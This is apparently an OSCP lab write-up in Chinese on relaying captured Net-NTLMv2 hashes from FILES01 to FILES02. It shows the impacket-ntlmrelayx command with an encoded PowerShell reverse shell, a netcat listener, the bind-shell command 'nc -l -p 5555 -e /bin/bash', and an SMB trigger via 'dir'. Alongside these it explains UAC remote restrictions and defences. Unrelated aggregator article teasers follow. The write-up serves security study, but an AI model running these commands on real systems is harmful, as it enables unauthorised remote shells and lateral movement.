❿⁄₁₄ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击实践 ➱ 传递Net-NTLMv2哈希

郑重声明:本文所涉安全技术仅限用于合法研究与学习目的,严禁任何形式的非法利用。因不当使用所导致的一切法律与经济责任,本人概不负责。任何形式的转载均须明确标注原文出处,且不得用于商业目的。

🔋点赞| 能量注入 ❤️关注| 信号锁定 🔔收藏| 数据归档 ⭐️评论| 保持连接💬

🌌立即前往👉晖度丨安全视界🚀​​​

​​​​​

▶ 信息收集
▶ 漏洞检测
初始立足点
▶ 权限提升
横向移动 ➢ 密码攻击 ➢ 传递Net-NTLMv2哈希🔥🔥🔥
▶ 报告/分析
▶ 教训/修复

目录

1.密码破解

1.1 破解Windows哈希实践

1.1.4 传递Net-NTLMv2哈希概述

1.1.4.1 攻击背景

1.1.4.2 攻击流程

1.1.4.3 UAC远程限制与中继攻击关系解析

1.UAC(用户账户控制)远程限制

2.中继攻击(Relay Attack)

3.UAC限制与中继攻击的关联

1.1.5 传递Net-NTLMv2哈希实践

1.1.5.1 攻击流程图

1.1.5.2 使用ntlmrelayx捕获与中继

1.1.5.3 设置反向Shell监听器

1.1.5.4 触发SMB连接

1.1.5.5 在ntlmrelayx的终端下看到中继到FILES02

1.1.5.6 在Netcat监听器捕获到FILES02的反向shell

1.1.6 现实环境限制:UAC远程限制的影响

1.1.6.1 UAC远程限制的影响

1.1.6.2 攻击成功条件

欢迎❤️ 点赞 | 🔔 关注 | ⭐️ 收藏 | 💬 评论


1.密码破解

1.1 破解Windows哈希实践

核心攻击场景:本文介绍第三种:获取并破解Net-NTLMv2哈希

攻击类型目标哈希手法简介
获取并破解NTLM哈希🗝️ NTLM哈希从内存或SAM数据库中提取哈希,并用工具(如Hashcat)破解
传递NTLM哈希🗝️ NTLM哈希直接使用哈希进行身份验证,绕过密码需求
获取并破解Net-NTLMv2哈希🔐 Net-NTLMv2哈希通过中间人或欺骗获取挑战-响应包,离线破解
传递Net-NTLMv2哈希🔐 Net-NTLMv2哈希在支持的环境下复用Net-NTLMv2响应进行身份验证

1.1.4传递Net-NTLMv2哈希概述

1.1.4.1 攻击背景

当获取到用户的 Net-NTLMv2 哈希后却无法破解(如密码过于复杂)时,攻击者可通过“哈希传递”继续渗透。本文介绍如何在无法获得明文密码的情况下,利用哈希中继实现横向移动。

🎯 核心前提:

主机 A(FILES01)与主机 B(FILES02)的认证凭据(即密码的 NTLM 哈希)必须相同
基于用户名files02admin,可推测该用户可能是FILES02 的本地管理员,从而尝试将哈希中继至 FILES02。


1.1.4.2 攻击流程

📌 详细步骤说明:

步骤操作说明
1️⃣建立 SMB 服务器攻击者使用 Responder 模拟 SMB 服务器并监听
2️⃣绑定 Shell在目标机(FILES01)上通过 netcat 等工具监听端口并获取 Shell
3️⃣发起 SMB 连接从目标机 Shell 中使用dir等命令连接攻击者的 SMB 服务器
4️⃣捕获并转发哈希Responder 捕获 Net-NTLMv2 哈希,并将其转发至 FILES02
5️⃣验证身份files02admin在 FILES02 上为有效本地用户,则身份验证通过
6️⃣执行命令通过 psexec、wmiexec 等工具在 FILES02 上远程执行命令

⚠️ 攻击成功关键点:

  • 哈希一致性:两台主机上的用户密码哈希必须相同

  • 用户权限:目标用户(files02admin)在目标主机上需具备足够权限(如本地管理员)。

  • 网络可达:攻击者机器可与目标主机进行 SMB 通信。


1.1.4.3 UAC远程限制与中继攻击关系解析

在此处,顺便详细解释下UAC(用户账户控制)中继攻击的关系。

1.UAC(用户账户控制)远程限制

UAC(用户账户控制)是Windows的核心安全机制,旨在阻止未授权的系统级操作。当进行需要管理员权限的操作时,会弹出提示要求用户确认。

🔒 远程限制特点

特性说明
默认启用Windows默认启用,对远程会话中的管理员权限施加限制
保护机制即使远程用户拥有管理员账户,也无法直接执行特权操作
安全意义防止远程攻击者轻易获取完全控制权

⚡ 两种状态对比

2.中继攻击(Relay Attack)

攻击原理:攻击者作为"中间人",截获并转发认证信息,在不获取密码的情况下冒充合法用户。

攻击流程图:

3.UAC限制与中继攻击的关联
目标系统状态攻击者权限推荐攻击方式难度等级
UAC远程限制已禁用拥有管理员账户直接特权操作⭐☆☆☆☆
UAC远程限制已启用(默认)拥有管理员账户中继攻击绕过⭐⭐⭐☆☆
  • 🔄 绕过机制:当UAC远程限制启用时,中继攻击成为绕过限制的有效手段

  • 🎭 身份伪装:通过转发其他用户的认证信息,攻击者可以绕过权限检查

  • ⚖️ 安全平衡:UAC限制增加了攻击难度,但无法完全防御中继攻击

💡防御核心要点:

  • UAC远程限制是Windows的重要安全边界,不应轻易禁用

  • 中继攻击利用认证协议弱点,是绕过UAC限制的常见技术

  • 攻击者根据目标系统的UAC设置动态调整攻击策略

  • 纵深防御策略(UAC+网络监控+强认证)能有效降低风险


1.1.5传递Net-NTLMv2哈希实践

1.1.5.1 攻击流程图

利用ntlmrelayx工具进行NTLM中继攻击,通过捕获SMB认证请求并转发至目标主机,最终获取反向Shell控制目标系统。


1.1.5.2 使用ntlmrelayx捕获与中继

启动ntlmrelayx中继服务

$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."

🔍 命令解析:

  • Base64编码命令:隐藏PowerShell反向Shell代码,规避检测

🔧核心参数详解

参数作用
impacket-ntlmrelayx启用NTLM中继攻击核心工具
--no-http-server禁用HTTP服务器,专注SMB协议
-smb2support支持SMB2协议,提高兼容性
-t 192.168.50.212指定中继目标(FILES02)
-c "powershell -enc..."认证成功后,目标上(FILES02)执行的命令:是Base64编码命令,隐藏PowerShell反向Shell代码,规避检测

1.1.5.3设置反向Shell监听器
# 攻击者的kali的新终端中执行 $ nc -lvnp 8080

🎯 目的:监听8080端口,等待ntlmrelayx中继后,FILES02发起的反向Shell连接


1.1.5.4触发SMB连接

🔧注意:这里有个前提:

攻击者能够在远程目标系统(FILES01)上获得了代码执行权限,然后绑定 Shell:它是一种攻击者通过远程命令执行,将目标主机系统的命令行界面绑定到特定端口的攻击技术。一旦成功,攻击者可通过网络直接连接到该端口,获得目标系统的交互式 Shell 访问权限。

# 在远程目标系统(FILES01)上绑定Shell命令,正常shell nc -l -p 5555 -e /bin/bash

现在在kali的另一个终端中运行Netcat,以连接到FILES01上的绑定shell(端口5555)。连接后,将输入dir \\192.168.119.2\test以创建与我们的Kali机器的SMB连接。同样,远程文件夹名称是任意的。

# 连接到FILES01的绑定Shell(5555端口) $ nc 192.168.50.211 5555 # 在FILES01的Shell中执行 > dir \\192.168.119.2\test

⚡ 触发机制:

  • 通过dir命令强制FILES01向攻击者的Kali机器发起SMB连接

  • 任意共享名(test)触发认证过程


1.1.5.5 在ntlmrelayx的终端下看到中继到FILES02

上述步骤执行后,在kali的ntlmrelayx的终端下会看到以下信息,成功将捕获到的Net-NTLMv2哈希中继到FILES02(50.212)上并认证成功:


1.1.5.6 在Netcat监听器捕获到FILES02的反向shell

然后在kali的Netcat监听器捕获到来自FILES02的反向shell(Base64的powershell命令---反向shell),我们成功启动的SMB连接获取和中继Net-NTLMv2哈希拿到了FILES02的shell权限。

🔍关键输出过程解析:

  • "SMB连接接收":ntlmrelayx成功捕获来自FILES01的SMB连接

  • "使用NTLM认证中继":攻击者将FILES01(50.211)的认证信息转发至FILES02

  • "身份验证成功":FILES02接受了转发来的认证凭据并身份认证成功

  • "PowerShell命令执行":在FILES02上运行Base64编码的反向Shell,连接回kali

📋攻击步骤总结:

步骤操作结果
1启动ntlmrelayx中继服务SMB服务器监听建立
2设置Netcat监听(8080端口)反向Shell接收端就绪
3连接FILES01绑定Shell获得FILES01访问权限
4执行dir \\Kali_IP\test触发SMB连接和认证
5ntlmrelayx捕获并中继NTLM认证转发至FILES02
6FILES02执行PowerShell命令反向Shell建立
7Netcat捕获反向Shell获得FILES02控制权

1.1.6现实环境限制:UAC远程限制的影响

1.1.6.1 UAC远程限制的影响

然而,在现实中如果目标系统启动了UAC远程限制,则在Active Directory环境中是域管理员(Domain Admin)权限时还是可以进行哈希传递或中继攻击;但是在本地管理员账户的远程登录行为进行权限限制。如下:

环境类型账户类型UAC远程限制的影响哈希传递/中继攻击可行性
Active Directory域环境域管理员(Domain Admin)通常影响较小(域管理员在远程登录时可能仍获得完全权限)🟢较高(可利用域管理员权限绕过限制)
Active Directory域环境域用户(在目标机有本地管理员权限)可能受限制(远程登录时令牌被过滤)🟡中等(可能需要额外绕过技术)
工作组环境(非AD)本地管理员账户严格限制(默认启用远程限制)🔴较低(难以直接执行特权操作)

📊AD环境 vs 非AD环境对比

环境类型UAC影响中继攻击可行性说明
Active Directory域内可能受限🟡中等域策略可能覆盖本地设置
工作组环境(非AD)显著限制🔴较低本地UAC设置起主导作用
UAC完全禁用无限制🟢攻击可直接执行特权操作

关键限制因素

  • 🚫 权限降级:远程会话中管理员令牌被过滤,缺少特权

  • 🛡️ 本地安全策略:UAC设置可能阻止远程代码执行

  • 🔐 认证上下文:中继的认证可能缺乏必要的安全标识符(SID)


1.1.6.2 攻击成功条件

成功条件(本次实验)

  1. UAC限制已禁用或配置允许远程管理

  2. 用户账户一致:FILES01和FILES02使用相同凭据

  3. 网络策略允许:SMB通信和反向连接未被阻止

现实挑战

  1. 默认Windows设置:UAC远程限制通常启用

  2. 现代防护机制:Windows Defender可能拦截异常PowerShell

  3. 网络监控:企业环境通常有IDS/IPS检测异常SMB活动

📈攻击演进趋势

随着Windows安全特性的不断增强,传统NTLM中继攻击的有效性逐渐降低。攻击者正转向更复杂的多阶段攻击凭证盗窃技术,防御方需保持持续的安全更新和威胁情报跟进。


欢迎❤️ 点赞 | 🔔 关注 | ⭐️ 收藏 | 💬 评论

每一份支持,都是我持续输出的光。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1184895.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

UL 认证光伏电表如何满足北美逆变器并网要求?

安科瑞刘鸿鹏在北美光伏市场中,无论是分布式屋顶光伏,还是工商业逆变器并网项目,对电能计量与并网监测的要求始终处在一个较高标准。并网合规、发电量核算、能量流向判定以及与逆变器系统的稳定通信,都是光伏系统能否顺利运行的基…

企业级光储充电站能量协调控制系统的设计与应用

安科瑞刘鸿鹏 摘要随着企业级光伏、储能及电动汽车充电设施的集中建设,光储充电站逐渐从单一能源设施演变为具备多源接入、多目标运行的复杂用能系统。如何在保障安全运行的前提下,实现新能源有效消纳、储能经济调度及充电负荷柔性管理,成为企…

2026版Java面试题库及答案解析

今年的行情,让招聘面试变得雪上加霜。已经有不少大厂,如腾讯、字节跳动的招聘名额明显减少,面试门槛却一再拔高,如果不用心准备,很可能就被面试官怼得哑口无言,甚至失去了难得的机会。 现如今,…

MATLAB 神经网络从入门到实战:零基础教程

一、神经网络核心概念与MATLAB优势 神经网络是模拟人脑神经元结构的数学模型,通过数据训练自动学习特征规律,广泛应用于分类、回归、预测等场景。MATLAB作为工程领域主流工具,其Neural Network Toolbox(神经网络工…

Java多线程编程:使用场景与实现详解

Java多线程编程:使用场景与实现详解 一、什么是多线程 多线程是指在一个程序中同时运行多个线程,每个线程可以独立执行不同的任务。Java从语言层面提供了强大的多线程支持,使得并发编程变得相对简单。 二、常见使用场景 1. 提高程序响应速度 …

疆鸿智能ETHERCAT从站转DEVICENET主站详细解读,建议点赞收藏术语

疆鸿智能ETHERCAT从站转DEVICENET主站详细解读,建议点赞收藏 术语 DeviceNet:DeviceNet是ODVA推出基于CAN的一种通讯规范 EtherCAT:EtherCAT(以太网控制自动化技术)是一个开放架构,以以太网为基础的现场…

读懂价格背后的语言:如何用速卖通价格历史图表,预判市场趋势与库存风险

当你在速卖通上看到一款常销产品的价格突然下跌,一个紧迫的问题随之而来:这是供应商为清仓或冲量进行的短期促销,还是预示市场饱和、竞争加剧的长期降价趋势?判断失误的代价是高昂的——若误将趋势当促销而大量补货,可…

免费查文献的网站推荐:实用且可靠的文献查询平台汇总

做科研的第一道坎,往往不是做实验,也不是写论文,而是——找文献。 很多新手科研小白会陷入一个怪圈:在知网、Google Scholar 上不断换关键词,结果要么信息过载,要么完全抓不到重点。今天分享几个长期使用的…

救命神器!专科生必看10个AI论文平台测评与推荐

救命神器!专科生必看10个AI论文平台测评与推荐 专科生必备的AI论文工具测评指南 在当前学术竞争日益激烈的背景下,专科生在撰写论文时常常面临内容构思困难、格式规范不熟悉、查重压力大等挑战。为帮助广大专科生高效完成论文写作任务,笔者基…

计算机毕业设计springboot宠物信息管理系统 基于Spring Boot的宠物信息综合管理系统设计与实现 Spring Boot框架下的宠物信息管理平台开发

计算机毕业设计springboot宠物信息管理系统8nh44 (配套有源码 程序 mysql数据库 论文) 本套源码可以在文本联xi,先看具体系统功能演示视频领取,可分享源码参考。随着宠物市场的蓬勃发展,宠物信息管理的需求也日益增长。传统的宠物…

【量化基础】数据驱动决策:从零接入StockTV实时行情API

【量化基础】数据驱动决策:从零接入StockTV实时行情API 在算法主导交易的今天,数据质量直接决定了策略的生死。本文将从量化基础切入,手把手教你如何用Python对接专业级数据源StockTV,为你的策略注入毫秒级竞争力。 一、量化交易的…

2026年轨道轴承市场报告:行业现状、驱动因素与未来发展趋势深度解析

轨道轴承,又称铁路轴承或轨道交通专用滚动轴承,主要用于支撑车轴并减少轮轨之间的摩擦阻力。与普通工业轴承相比,轨道轴承需承受更高的载荷、更频繁的冲击以及极端温差环境,因此对材料强度、密封性、润滑性能和疲劳寿命有严苛要求…

贵州省考报名今天开始!详细报名流程秒懂

贵州的考公人集合啦!2026贵州省考报名通道已经正式开启🔛 从照片调整到选岗缴费,我把全流程都给你们整理好啦👇⏰ 关键时间节点 ✅ 报名时间:1月19日9:00—1月23日 ✅ 初审时间:1月19日—1月25日 ✅ 缴费时…

计算机毕业设计springboot网络云盘系统的设计与实现 基于Spring Boot框架的网络云存储系统开发与实现 Spring Boot驱动的网络云盘系统设计与开发实践

计算机毕业设计springboot网络云盘系统的设计与实现_10f66(配套有源码 程序 mysql数据库 论文) 本套源码可以在文本联xi,先看具体系统功能演示视频领取,可分享源码参考。随着信息技术的飞速发展,网络云盘系统已成为现代信息管理的…

构筑价格护城河:如何用速卖通价格历史监控,第一时间狙击低价跟卖

你花费数月打磨详情、积累评价,终于将一款产品推至热销榜。但很快,订单增长开始停滞,利润空间被莫名压缩。当你点开产品页面,发现下方悄然出现了数个“Similar item”,以低于你10%-20%的价格,蚕食着你的流量…

英文文献检索的方法与技巧:提升学术研究效率的关键步骤

做科研的第一道坎,往往不是做实验,也不是写论文,而是——找文献。 很多新手科研小白会陷入一个怪圈:在知网、Google Scholar 上不断换关键词,结果要么信息过载,要么完全抓不到重点。今天分享几个长期使用的…

rce知识点

一、RCE漏洞核心概念 RCE(Remote Code Execution)即远程代码执行漏洞,指Web应用因代码/命令执行函数使用不当,导致攻击者可构造特定输入(payload),让服务端执行非预设的系统命令或脚本,进而实现数据窃取、服务…

实验小白必看:重组蛋白表达系统怎么选?原核与真核表达系统技术差异全解析

重组蛋白是生命科学研究中最基础、也是最常用的科研试剂之一。从功能蛋白研究、抗体筛选到信号通路分析,重组蛋白的质量和来源直接影响实验结果的可靠性。对于初入实验室的研究人员而言,理解重组蛋白表达系统的技术差…

select chain_id,num_waiters,in_wait_sesc,osid,blocker_osid,substr(wait_event_text,1,30) from v$wait_

Oracle 数据库中用于实时诊断阻塞(锁等待)链的核心视图 V$WAIT_CHAINS 中的关键信息。这条查询能清晰地展示“谁在等谁”的关系链,是DBA定位数据库卡顿、挂起问题的利器。为了方便你理解,下表详细解释了查询中的每个字段&#xff…

【工具变量】国家数据知识产权试点DID(2000-2025年)

国家知识产权局在2022年11月启动首批数据知识产权地方试点,明确试点地为:北京、上海、江苏、浙江、福建、山东、广东、深圳,试点期限为2022年11月—2023年12月。2023年12月确定了第二批试点地区:在上述8地基础上,新增天…